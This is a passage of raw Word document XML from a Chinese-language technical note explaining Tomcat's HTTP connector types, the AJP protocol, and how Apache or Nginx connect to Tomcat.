          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的请求；此连接器是一个</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类，定义在</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>server.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当中，默认使用</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8080</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRPr="005E35AB" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2) Java</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开发的高性能</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NIO HTTP/1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接器，它支持非阻塞式</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Comnet</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，在基于库向</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发起请求时，此连接器表现不俗；但其实现不太成熟，有严重</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bug</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRPr="005E35AB" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3) C/C++</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开发的</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>native APR HTTP/1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接器；在负载较大的场景中，此连接器可以提供非常好的性能；</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>APR</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache Portable Runtime</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，它是一个能让开发者采用与平台无关的风格的方式来开发</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C/C++</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码本地库，它能够很好的跨</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows,</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的采用的是第</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>种连接器类型。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRPr="00837FA2" w:rsidRDefault="00EE184C" w:rsidP="00075411">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="center"/>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4516374" cy="4045305"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="225" name="图片 3" descr="C:\Users\Administrator\AppData\Roaming\Tencent\Users\407345725\QQ\WinTemp\RichOle\1ISILZ@ME4~0N5WX@ZBCUJ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strator\AppData\Roaming\Tencent\Users\407345725\QQ\WinTemp\RichOle\1ISILZ@ME4~0N5WX@ZBCUJX.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId250" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4517657" cy="4046454"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其他参考资料</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRPr="00180A28" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间采用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议进行传输</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tomcat ajp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AJP</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>是定向包协议。因为性能原因，使用</w:t>
      </w:r>
      <w:hyperlink r:id="rId251" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00180A28">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>二进制</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>格式来传输可读性文本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRPr="00180A28" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="245" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通讯方式</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>1. JK</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单独安装</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JK</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块，通过使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AJP</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议进行连接；</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>2. Proxy_AJP</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> apache</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自带模块，通过使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AJP</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议进行连接；</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>3. Proxy_HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> apache</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自带模块，通过使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议进行连接；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRPr="00180A28" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一般维持和</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web Container</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的多个</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TCP Connecions</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，即</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接池，多个</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>request/respons</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>循环重用同一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Connection</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。但是当</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Connection</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被分配（</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Assigned</w:t>
      </w:r>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）到某个请求时，该请求完成之前，其他请求不得使用该连接。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRPr="00180A28" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="323" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Tcp Connection </w:t>
      </w:r>
